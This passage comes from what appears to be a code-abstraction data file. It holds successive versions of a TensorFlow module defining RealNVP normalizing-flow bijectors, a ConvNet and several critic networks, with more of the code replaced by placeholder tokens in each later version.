self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n\n\nclass LayerNorm(tfkl.Layer):\n <docstring token>\n <function token>\n <function token>\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n\n\nclass LayerNorm(tfkl.Layer):\n <docstring token>\n <function token>\n <function token>\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n <function token>\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n\n\nclass LayerNorm(tfkl.Layer):\n <docstring token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n<class token>\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n<class token>\n\n\nclass ConvNet(tf.keras.Sequential):\n <function token>\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, 